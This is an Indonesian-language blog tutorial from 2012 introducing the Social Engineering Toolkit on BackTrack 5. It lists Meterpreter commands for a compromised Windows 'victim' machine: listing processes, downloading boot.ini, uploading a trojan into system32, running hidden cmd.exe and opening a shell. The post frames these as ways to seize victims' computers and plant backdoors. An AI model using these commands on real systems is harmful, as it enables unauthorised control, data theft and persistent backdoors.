Wednesday, 4 April 2012

Social Engineering Toolkit




-------------SOCIAL ENGINEERING TOOLKIT----------------------

Social engineering adalah tindakan untuk memanipulasi pikiran seseorang untuk mendapatkan tujuan yang diharapkan. Soc-eng adalah istilah umum dan dalam keseharian setiap orang melakukan hal ini, tetapi penggunaan Soc-Eng dalam dunia hacking dan Pen-Test menjadi sedikit berbeda. Fungsi utama daripada Soc-Eng dalam dunia Hacking adalah untuk mendapatkan informasi, mendapatkan izin akses dan banyak hal yang lainnya juga.

Ada banyak macam tehik Soc-Eng, tips dan trick menpgenai hal ini banyak bertebaran di internet seperti tutorial yang sedang anda baca ini, dan juga banyak sekali tool yang dapat digunakan untuk melakukan tehnik serangan Social-Engineering.

Sekilas tentang Social Engineering Toolkit (S.E.T)

Kali ini kita akan membahas mengenai penggunaan S.E.T pada mesin BackTrack 5 untuk melakukan hacking pada mesin windows, tetapi sebelum kita melanjutkan pada bahasan lebih lanjut saya ingin menyampaikan sedikit pengenalan tentang S.E.T ini yang sangat bermanfaat bagi Nubee.

S.E.T adalah script berbasis bahasa pemrograman python yang berisi sekumpulan tools yang difokuskan untuk melakukan serangan terhadap kelemahan user/manusia didalam Pen-Test. Tujuan utama dari S.E.T adalah mensimulasikan Soc-Eng attack sehingga dapat memungkinkan penguji suatu sistem untuk secara efektif dapat menguji bagaimana serangan dapat berjalan dengan baik.

Social-Engineering toolkit tersedia sebagai peralatan standard dalam BT5.


Jika anda menggunakan distro Linux yang lain dan ingin memasang S.E.T didalamnya silahkan lakukan langkah berikut :

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

-----------Social Engineering Toolkit Tutorial------------------

Dalam tehnik kali ini saya masih setia menggunakan Mesin BT5 saya, dan tutorial kali ini akan menunjukan suatu single methode untuk menguasai komputer korban dengan menggunakan S.E.T dan pada lain kesempatan akan saya postingkan tutorial lebih lanjut dalam penggunaan S.E.T, agar penggunaan S.E.T dapat dipahami dengan baik saya telah mencarikan video tutorial untuk memudahkan.


------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------
berikut beberapa perintah yang digunakan dalam video :

--ps

Perintah 'ps' digunakan untuk melihat list dari proses yang berjalan pada PC target.

    meterpreter > ps

--Download

    meterpreter > download c:|\\boot.ini

--Upload

    meterpreter > upload evil_trojan.exe c:\\windows\\system32

--Execute

    meterpreter > execute -f cmd.exe -i -H



--shell

Jika anda ingin mendapatkan akses terhadap Screen DOS dari Komputer korban untuk upload dan downlod backdoor yang akan anda tanamkan pada komputer korban ataupun hal lainnya gunakan Shell prompt.

    meterpreter > shell
    Process 39640 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>

Selamat membaca dan jangan lupa memberikan koreksi ataupun komentar, salam berbagi.

Reaksi:

2 komentar:

Salam kenal bang... Ane nubi

Kalo buat windowns bisa gk!!! Windowns 8

Post a Comment

Alangkah berbudinya anda, jika sedikit meninggalkan pesan untuk saya...